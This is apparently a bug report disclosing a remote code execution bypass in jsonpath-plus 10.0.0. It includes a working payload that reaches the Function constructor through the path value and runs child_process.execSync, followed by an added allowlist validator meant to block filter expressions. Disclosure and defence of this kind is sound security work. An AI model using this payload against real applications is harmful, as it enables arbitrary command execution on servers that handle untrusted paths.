Describe the bug
The JSONPath Plus Remote Code Execution (RCE) vulnerability has been patched in version 10.0.0, but Remote Code Execution (RCE) is still possible with the payload below as the path value.
Code sample or steps to reproduce
```js
const { JSONPath } = require("jsonpath-plus"); // jsonpath-plus == 10.0.0

// $[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())]
const result = JSONPath({
  path: '$[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())]',
  json: { a: "x" },
});
```
Expected behavior
- Potential Remote Code Execution (RCE)
- Potential Cross-site scripting (XSS)
Environment (IMPORTANT)
- JSONPath-Plus version: 10.0.0
Desktop
- OS: macOS
- Node Version: v21.7.3
CC @shpik-kr
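
The report above hinges on the `path` value reaching the library's filter expression evaluator. As an added example (not part of the original report and not jsonpath-plus code), this is a pre-check that refuses any user-supplied path containing filter or script expressions before it is passed to `JSONPath`; the function names, the length limit and the accepted grammar are assumptions for an application that only needs plain navigation.

```javascript
// Added example: allowlist check for JSONPath strings that come from users.
// Assumption: the application only needs plain navigation, so filter "?(...)"
// and script "(...)" expressions are never accepted from untrusted input.
const MAX_PATH_LENGTH = 256; // assumed limit; tune for the application

// One path segment, matched at the current position (sticky flag "y").
const SEGMENT = new RegExp(
  [
    String.raw`\.\.?(?:[A-Za-z_][A-Za-z0-9_]*|\*)`,            // .name ..name .* ..*
    String.raw`(?:\.\.)?\[(?:\*|-?\d+)\]`,                      // [*] [0] [-1] ..[0]
    String.raw`(?:\.\.)?\[(?:-?\d+)?:(?:-?\d+)?(?::-?\d+)?\]`,  // [1:3] [:2] [::2]
    // Quoted names: no quotes, backslashes, brackets or parentheses inside,
    // a deliberately conservative choice.
    String.raw`(?:\.\.)?\[(?:'[^'"\\()\[\]]*'|"[^'"\\()\[\]]*")\]`,
  ].join("|"),
  "y"
);

function isSafeJsonPath(path) {
  if (typeof path !== "string" || path.length > MAX_PATH_LENGTH) return false;
  if (path[0] !== "$") return false;
  let pos = 1;
  while (pos < path.length) {
    SEGMENT.lastIndex = pos;
    if (SEGMENT.exec(path) === null) return false; // unknown syntax: refuse
    pos = SEGMENT.lastIndex;
  }
  return true;
}

// Throws before the string can reach JSONPath({ path, json }).
function assertSafeJsonPath(path) {
  if (!isSafeJsonPath(path)) {
    throw new Error("rejected JSONPath: only plain navigation is allowed");
  }
  return path;
}

// Constructed sample inputs.
const samples = [
  "$.store.book[0].title",   // accepted
  "$..book[-1:]",            // accepted
  "$['a']",                  // accepted
  '$[?(@.a == "x")]',        // filter expression: rejected
  "$[(@.length-1)]",         // script expression: rejected
];
for (const p of samples) console.log(isSafeJsonPath(p), p);
```

A check like this complements, and does not replace, upgrading to a release that fixes the evaluator. jsonpath-plus also documents an `eval` option, and setting it to `false` disables expression evaluation inside the library itself.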